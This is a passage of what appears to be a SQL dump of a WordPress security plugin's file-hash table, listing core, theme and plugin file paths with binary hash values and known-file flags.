�','',0,'?'),('�:O��-�Ax�P�h��L','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B�)>|�o.P��','����<\n�@ô�H�+ީ�eI�-\"��mb*!y','',0,'?'),('�>�c�.�:_�9(7','wp-content/themes/hueman/option-tree/assets/images/ot-select-hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EA��b����NI4','(�y�;�Xvaϫ_@_���=1�QՓ3[���','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x ��\0�\Z�*m7v%',']jH��#���?�����j6MI�aҰ�(e��','',0,'?'),('�V�*]�|@e&�z��','wp-content/themes/gambit/inc/customizer/functions/callback-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��okn,��_���F�=','rq8Sbp�b�ȷ�p�v0m��%2o7���?�','',0,'?'),('�_�xx����,����M','wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php',0,'�[q�7d�v���z�','�[q�7d�v���z�','\'֪��* [\0EE*J�r�V�s�����c�?','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('�tA���Q\r2�G��','wp-content/themes/storeone/js/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dst}��GXp6��H\r�','E`ӛ�oE��wDٍ:=x ���h}��in','',0,'?'),('�y�8��c4�i��','wp-includes/wp-includes/js/jquery/ui/checkboxradio.js',0,'�\"VSdF\n��k���:','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('ɏ�u��&\\��Z','wp-includes/wp-includes/js/dist/server-side-render.js',0,'1�eQǔ;-P7�苛�d','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('ɣ/e��;���v�','wp-includes/wp-includes/class-wp-application-passwords.php',0,'�;�Q����cW�M7A','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('ɨs|�P���5��d�','wp-content/themes/promote/inc/kirki/assets/js/reset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v]���Q]\r� �g��','v��aAkP��TrBC^z��(piB�i��k:�','',0,'?'),('�r�)x��Sm���h','wp-content/themes/event/inc/customizer/functions/register-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�\r���9Y=��A�','э�l\Z�k^�xU䊒�����>��hӨ���','',0,'?'),('�Ŏ�����l����F','wp-content/themes/hueman/functions/czr/modules/modules-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?7*J3cY>�уQ�B�','>���������=G��^���,!P���q7�~T','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('���=)�`K�\'��xXe','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',0,'�u��u��tu�+]�a','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('� ��!�Yi9\r����Bq','wp-content/themes/auberge/includes/custom-header/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��6\rP�530\n�R','��x[E-� �=7\rڮ�Q��o4I��D��>','',0,'?'),('� ��_�Ώ%���b�2�','wp-content/themes/auberge/includes/theme-options/theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��&��k{֧��','�d~Y+L*�Qb&Q��a aԂU�\Z��*�l\0�#}�','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('������d�(�a','wp-content/themes/gambit/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�t��DՁ�R�','��\\s{��\ZZ�g�|)4�P�l�u�((�di{','',0,'?'),('�5�3����e~W�','wp-content/themes/spidermag/assets/js/sp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO%]�g��\ZШd','��@�7���4�A�\'\Z�m&���P���','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƶ���s�[��\"�','�]:\r+�����ʩ\'X�bҸX�����LU�','',0,'?'),('�5{�It�d���\0','wp-content/themes/spidermag/assets/images/preloader/grid.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���o�+O*̓','���%T�#��y�vV�.��S�#�7?B�','',0,'?'),('�R���ш��0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0���M���\"�\\\\�','9\\�P�;P�;p�%/���?����]z]C�ǐ��','',0,'?'),('�g7,u,�<I���ͥ�','wp-includes/wp-includes/css/dist/block-directory/style-rtl.css',0,'���gJ��^<','���gJ��^<','���\ZybF���v��J�}�z��Lj�� (','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�,k�=G�c�x�','C������ �9�1�@���*C���Z','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�9��yu�S�,�,�k','� �m���������BFX&I�[s��','',0,'?'),('�t*4bo����e0-x','wp-content/themes/weblog/acmethemes/core/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��w�9�ͻ;�','h�e�� .7��V[�æ�?�,_RyS����N','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[ &�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('ʯ��!;2��^x��g','wp-content/themes/hueman/option-tree/assets/images/ot-select.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�vlR�[�B�y��1��','��`��?�S������K ����ڍ�u��','',0,'?'),('ʴM\ZN��@���ɇ�','wp-content/themes/auberge/assets/js/vendor/slick.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�(9�6�\"U�T��','�U�����`�0Y��\"H����ә@���','',0,'?'),('ʵs�� ����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kp@/ya3ˡ�ZіO','��1�*C�4é�GNÈOA�p1v7.�wV%��2F','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('�� b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�+���l�@�h�','3�i]m���&� ��s֯�I��g�e�ok��/M�','',0,'?'),('���e�U_��_�\Z��','wp-content/themes/promote/inc/kirki/assets/images/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MF�v\Z��x2�t','�1�-�$��:O���y!�:ke(�ײ����w�','',0,'?'),('��TF�����B��e�1','wp-includes/wp-includes/block-patterns/quote.php',0,'c�:�v,^8^����\"�}','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u� �Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('��<�?�h�Y�Ae�','wp-content/themes/promote/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`̺#��+&>�Yhi��','�a(��J`!�^~���]|�\"b�i','',0,'?'),('��E\0|xJ�����','wp-content/themes/hueman/functions/init-wp-core-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0I\Z,���� \n�l','}�>�I}��:��߀��)�3����TJ�1','',0,'?'),('�\0w��_E��d����q','wp-includes/wp-includes/js/wp-embed-template.min.js',0,'x)�tM�`WXx>�5�\\�','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('�QO3ə�n0��Lm','wp-content/themes/Kent/search.php',0,';(5�@�G*���S=',';(5�@�G*���S=','����\\�\Z�%�L���H�v*$r��F�V�י','',0,'?'),('� <T�F0pP,�&��\nz','wp-content/themes/event/inc/js/event-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\$6Ʊj�6N��B;�','�o����諥�_��Ek< ����qh','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X & )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�(�fbܜ�}W��F�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',0,'�}*�yY��ը�F�','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�G�j!�ۘ#ys�ǵ#','wp-content/themes/kidzoo-lite/homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٳѪo�qL����6��','\'K�8�nP}�bO(�f`���0��,��֛�h','',0,'?'),('�R���<%���D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�z4E�=��I)','-&}�)j�ZS�̻e��Ҥ����\'�Z?P�f','',0,'?'),('�U��}�B�� Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pc�\r��� �\"��','~u~01���8c�8�ɹ��F��E��1=���','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J� ���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('ˍD{�mm�PtO��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˏ�s6�L�,5I&&Z','wp-includes/wp-includes/js/dist/warning.min.js',0,'�@AUV����x��\0�','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('˩C�@�����\\��','wp-includes/wp-includes/js/dist/components.js',0,'\Z�^�}!��〼����','\Z�^�}!��〼����','Ƽy�e�s�<���z�E�,_:�<E� =�+�.','',0,'?'),('˺h�VK�4�\'h~�j','wp-content/themes/kidzoo-lite/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�:4��$~�M�uI� �','.�M̗�M@�e��/H�ȥ�/�Ut�W�n�q�','',0,'?'),('˼��Ѵo�� ����','wp-content/themes/advance/inc/kirki/includes/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�<q/r<���?��','�쮀ܻ�3OqJ\0��i<���i<��I��','',0,'?'),('� p_��+�R�f�(�','wp-content/themes/storeone/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�~K��5Uч�','��L d1�7�|�nq��+��)M>Aa�fڭ','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('�����k2�n���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�L�[�q?���_','o�a��il2V*�B�h_|��{���l��\r��','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('��f��W5��_��\'\0�','wp-content/themes/auberge/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���7 iH�l�9Wi','S<P8?fk�W�<�Jq}s�Q�O�Hȸ���cn','',0,'?'),('����{�@�q��mu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��E�50Q��D=�l�','�2&���.����(SG�l���^�N��C&/ρ�','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�VgN�7��?:^�','�Z*\n���&z9f?�\"k�>tg','',0,'?'),('�*q��%kHio�2b�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.video.play.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7�\0�Y�_a���ע','zt�͂}6S���^�l�,ԟ��27rG\'0','',0,'?'),('�-�+N�>Ĕ��ђ','wp-includes/wp-includes/images/blank.gif',0,'��ʟg��h�kK��f','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�I=�Y_s7y4���26+','wp-content/themes/hueman/functions/czr/tmpl/modules/social-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h{/pA$Y�d� �=�','\r��$�+�_.9rW���l��2[Ox��̩O�','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�S�aJ�I2ӊ���*�','wp-content/themes/wp-barrister/alt_homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˹w\"�\rN{~�x�','�pY���doL�����d�r�Q$JJ~�B\'','',0,'?'),('�Vd ]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�nr�\'U���o{��','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�l{�Y�H�&��<ۏ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',0,'�[\0a�C����J�','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('�n�-����M�a','wp-content/themes/kidzoo-lite/sass/base/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�\Z$��c2�9��B�','� 8���>�~i2~��!L���W��� �1^��>','',0,'?'),('�z4�)�-E�ɽ�','wp-includes/wp-includes/images/wlw/wp-icon.png',0,'1 �ʚ�7w3K��*','1 �ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�{�P_�9Ԧ','�;�z��zu�P�Z2J���F�z�S8\">','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��| J��','',0,'?'),('̈Wq�T {xH����','wp-content/themes/sg-window/page-templates/no-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'OmԽGU�#�k���','���Ƣܤ4���#މ�P�o{%}\'���D�Ɯ','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̓ l�珅�\0��;�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`̺#��+&>�Yhi��','�a(��J`!�^~���]|�\"b�i','',0,'?'),('̖���ɲ����e�R�!','wp-includes/wp-includes/js/dist/rich-text.min.js',0,'Y�����Lc#Ul6��E','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̡�yQ4�4ϝK�8D','wp-content/themes/travel-stories/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W\"j���e�U�Y���','�*Q�V�g(��\Zv9$�[�Ѿ\Z���Ɉ�','',0,'?'),('̩\"���s�ex�Uah','wp-content/themes/promote/inc/kirki/assets/scss/controls/switch.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AT��\Z>�n�\'rw�,�','-2 }�\r^�#�k\Z����u�l��TV�. ','',0,'?'),('̸����-]\Z���n�','wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�wZ��~�� ��\'',' z�`WN?]�ӟ�B,K���Jl��W��>k�','',0,'?'),('̽� ���X�$oB�','wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z>(9��\"r�4\"��','v&�`���^�i��Af��Eg|!$~�Iu�2�','',0,'?'),('���8�U����F���','wp-includes/wp-includes/nav-menu-template.php',0,'JI1E%g䅝�?�&�','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����Wz�EY�','�����Q�M��d�� ���XټT%�c�','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('��\ZM���a�{��9','wp-content/themes/auberge/library/controls/class-WM_Customizer_HTML.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ɫbS�vV��%��','3쓾��7Q}eC��4��u�d���-O�㦨_','',0,'?'),('�̧\'�\\�z����co','wp-content/themes/sg-window/inc/customize-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�����зC�Cl�','W3�H���,8�k�\r%?]���Z�Jx�','',0,'?'),('��3d@w@1&�cw �','wp-content/themes/sg-window/img/icons/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�E�a�kf\Z���Η','��Ga�����\Zr�!�<az��Gfx�dI�','',0,'?'),('��`�jB�\\��\"?','wp-content/themes/advance/inc/kirki/assets/scss/controls/palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʮKYo�\'L}b��','K�TA�ԢF�%\0W�E�7��8�\r�;=��','',0,'?'),('�+�c��8��nwd]','wp-content/themes/newsmag/assets/images/picture_placeholder_list.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vQ*�ڴ�co\\+7�XE','�n|��R+*��b ?q\'����fhV�L�a\r�QQ','',0,'?'),('�#\Z_U�P��\0�h','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',0,'�F�S:&\0��>f�\\�','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('�S6j���} �X�o�','wp-content/themes/gambit/inc/customizer/sections/customizer-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���+>�?�9���','��.�UB�\r�����g�\0\"Ȩc��K;׆','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�y-�uv� O�C','����\0���˝`&�q�G%\Zh�����,#�','',0,'?'),('�n �}V-����I�','wp-content/themes/twentytwenty/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�P�2��%F��,�-','�ʄ�%��Ũ�k$ Ȏ������g?��Ҧ�','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ�� �qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�,�@�M\r�O��0�T','wp-content/themes/showcase-lite/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<y6��6}o4� �c�','&����>��W��X\n��C��Q@M�B�[K>��','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�[��o���b$�Ӯz,','wp-includes/wp-includes/css/dist/block-library/style-rtl.css',0,'RV�0 ���*��','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%��� ^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\'�K��5oi�J�','�C�C���V��c��x�\"a�8q�vu\Za�','',0,'?'),('�|����X 6~9�`�','wp-content/themes/Yegor/bootstrap/bootstrap.min.js',0,'\0H(�[B\r������@�A','\0H(�[B\r������@�A','��=\'~����s8��u�_�[���*>�\n','',0,'?'),('́Ӡ3����U�����','wp-content/themes/weblog/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�!,�&�()�2��G�1','����Bm�+\\�M��Xr+�>o6�����\r�g�','',0,'?'),('͂ϕ������\'�','wp-content/themes/promote/inc/kirki/assets/images/3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٱ�!+S����i?','�&�P��tAez��s��j�ۤݥAd}��ʄ','',0,'?'),('͌NGF�f ��7�}','wp-content/themes/Yegor/comments.php',0,'3u��eo\0Y^Y�jf~��','3u��eo\0Y^Y�jf~��','GA���(f�m&��|��!��cX�*۵�q�B5','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('͖w�W)���f\'M��','wp-includes/wp-includes/block-patterns/large-header-button.php',0,',\r��\Z�&o�r\'���',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('͚3��V���ɜ��c','wp-content/themes/advance/images/work_img1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����PϢ}�)�#�','c�������>�?�QYY�NZr��\"��^G<��[','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j 